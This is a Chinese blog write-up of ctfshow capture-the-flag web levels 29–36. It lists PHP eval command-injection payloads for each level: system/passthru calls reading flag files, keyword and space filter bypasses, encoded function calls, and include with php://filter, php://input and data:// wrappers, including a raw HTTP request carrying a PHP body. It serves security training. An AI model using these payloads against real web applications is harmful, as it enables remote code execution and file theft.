ctfshow-web-命令执行

已于 2024-03-24 02:30:31 修改
阅读量568 收藏 12
点赞数 7
分类专栏: CTF-WEB 文章标签: 网络安全
于 2024-02-19 13:23:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xunyue88/article/details/136167340
版权
文章详细讨论了在Web应用中,如何利用GET参数的不当处理进行系统命令执行、文件包含、编码绕过等攻击手段,以及后续版本中对PHP函数、字符和伪协议的过滤措施。
摘要由CSDN通过智能技术生成

  1. web29
    eval了GET的参数,没过滤就system执行,但是匹配到大小写的flag就不执行。

    ①直接执行系统命令
    ?c=system(“tac fla*”);
    ?c=system(“cp flg.php a.txt ");
    ?c=passthru("cat fl    ”);
    ?c=echo shell_exec(“tac fl*”);
    ?c=echo exec(“cat fl*”);
    ?c=highlight_file(next(array_reverse(scandir(“.”))));

    ②内敛执行
    ?c=echo cat fl*;
    ?c=echo cat fl??.?hp;

    ③利用参数输入+eval
    ?c=eval($_GET[1]);&1=system(‘tac fla*’);

    ④利用参数输入+include+伪协议(不用括号、分号)
    ?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

  2. web30
    过滤了php、flag、system
    补充打印文件命令?c=echo%20nl%20fl%27%27ag.p%27%27hp;

  3. web31
    preg_match(“/flag|system|php|cat|sort|shell|.| |'/i”, $c)
    其他的过滤了无所谓,但过滤了.和空格

    ①其实就是highlight_file(flag.php);的url编码,适用php7
    ?c=(~%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A)(~%99%93%9E%98%D1%8F%97%8F);

    ②通过嵌套eval函数来获取另一个参数的的方法来绕过,不会判断其他参数的传入
    ?c=eval($_GET[a]);&a=system(‘cat flag.php’);

    ③用函数绕
    ?c=show_source(next(array_reverse(scandir(pos(localeconv())))));
    ?c=show_source(scandir(getcwd())[2]);

    localeconv():返回包含本地化数字和货币格式信息的关联数组,这里主要是返回数组第一个"."
    pos():输出数组第一个元素,不改变指针
    scandir():遍历目录,这里因为参数为"."所以遍历当前目录
    array_reverse():元组倒置
    next():将数组指针指向下一个,这里可以省略倒置和改变数组指针,直接利用[2]取出数组也可以
    show_source():查看源码
    getcwd():获取当前工作目录

    ④绕空格
    ?c=passthru(“tac%09fla*”);
    ?c=passthru(“tac${IFS}$9fla*”);
    中间拼接用%09
    ${IFS}$9替换, 不行就在第一个$转义试试

  4. web33
    多过滤了; 命令执行构造包含然后伪协议不用分号

if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);

include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
  1. web34
    相比上题多过滤了冒号。
同上,秒了
  1. web35
    多了=和<,意思就是不让?>绕分号嘛,但是还是可以构造include秒了,试试POST方法的,需要伪协议input执行该POST请求。
GET /?c=include$_GET[1]?>&1=php://input HTTP/1.1
Host: 8885362a-8593-4c47-8a66-49fc4ab85f9f.challenge.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 31

<?php system('tac flag.php');?>
  1. web36
?c=include$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php

?c=include%0a$_GET[a]?>&a=data://text/plain,<?php system("tac fla*");?>
Xunyue88
关注
  • 7
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
CTFShow Web入门 命令执行(持续更新)
最新发布
tj13995958709的博客
04-22 1869
3.array_pop(next(get_defined_vars()))是将数组中最后一个键值对的值弹出,配和POST传入的1=phpinfo();过滤了数字、大小写字母和一些特殊符号,基本大部分的都过滤了,只能对ASCII码中没被过滤的字符进行匹配,需要用到python写一个自动化脚本,以下是摘自往上的python脚本代码。除了system()、反引号``可以执行系统命令,exec()、shell_exec()、passthru()等函数也可以。这题又多过滤的几个特殊符号,通配符*被过滤了,可以用?
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
Jay17的博客
08-16 3222
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
ctfshow-命令执行
YkingH的博客
01-28 3856
命令执行 命令执行常见做题姿势 *或?代替文件名全拼 用其它的命令执行函数代替被过滤的函数 用已知参数传入另一个无限制参数,构造木马 编码绕过 include 不用括号 分号可用?>代替 cat替换 内部字段分隔符$IFS grep 通配符匹配 无字母数字的webshell $(( ))与整数运算 脚本 复制重命名绕过 fopen 路径读取 文件高亮 文件包含 exit() mysql load_file读取文件 命令接口 等等 web29 error_reporting(0); if
ctfshow命令执行(29-38)
wjf051006的博客
12-05 347
这个公式可以一直沿用到36 自己对比被过滤的东西就好了 这就是博主的公式啊 你们有没有这样的公式啊 真是轻轻又松松啊。多过滤了个system 能替代system的还不少 可以自行百度 我用的是passthru。但是问号绕过flag.php需要fl?又做了点题 我每次做题都看题解 准备给别人也搞一份一看就会 没疑问的题解。多过滤了php flie 但是咱们还是可以用 =来代替php。看看代码 过滤了flag 这里可以用*和?include包含了文件 而且过滤了flag。要注意的是*可以用这样的姿势 f*
CTFSHOW WEB入门 命令执行做题笔记(持续更新)
CyhDl666的博客
03-27 354
校队考核被打自闭了 回炉重造 文章目录29-362930313233-3637-4437383940 29-36 29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 大小写过滤了flag 自己构造的p
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
CTFShow-周末大挑战parse-url篇Writeup
05-19
这表明服务端没有对用户输入进行充分的过滤或转义,允许了任意命令执行。 第二关中,URL编码的方式被用来绕过过滤。`%68%74%74%70%3a%2f%2f%64%61%74%61%3a%3a%2f%2f%74%65%73%74%2f%70%6c%61%69%6e%3b%62%61%73%65...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
Web】CTFSHOW PHP命令执行刷题记录(全)
uuzeray的博客
01-10 1128
期末复习不了一点,不如做点旧题醒一醒手感。每一题都尽量用不同payload,如果相同会合并。
CTFSHOW命令执行做题总结(小白文章)
qq_62147945的博客
03-23 462
直接上聊天记录了由于我是一个小白,而且也是第一次写文章,第一次写总结,有的思路逻辑可能有错误,或者文章结构杂乱,佬们多多包涵就行了(狗头)。
CTFshow-web入门-命令执行
m0_52920608的博客
03-26 5287
CTFshow web入门 命令执行 ctfshowweb命令执行
CTFshow-命令执行(1)
qq_61376069的博客
12-30 351
CTFshow入门——命令执行29-40 用分号、字母、小括号从变量入手;eval逃逸参数
ctfshow-web-web红包题
07-14
如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包题需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值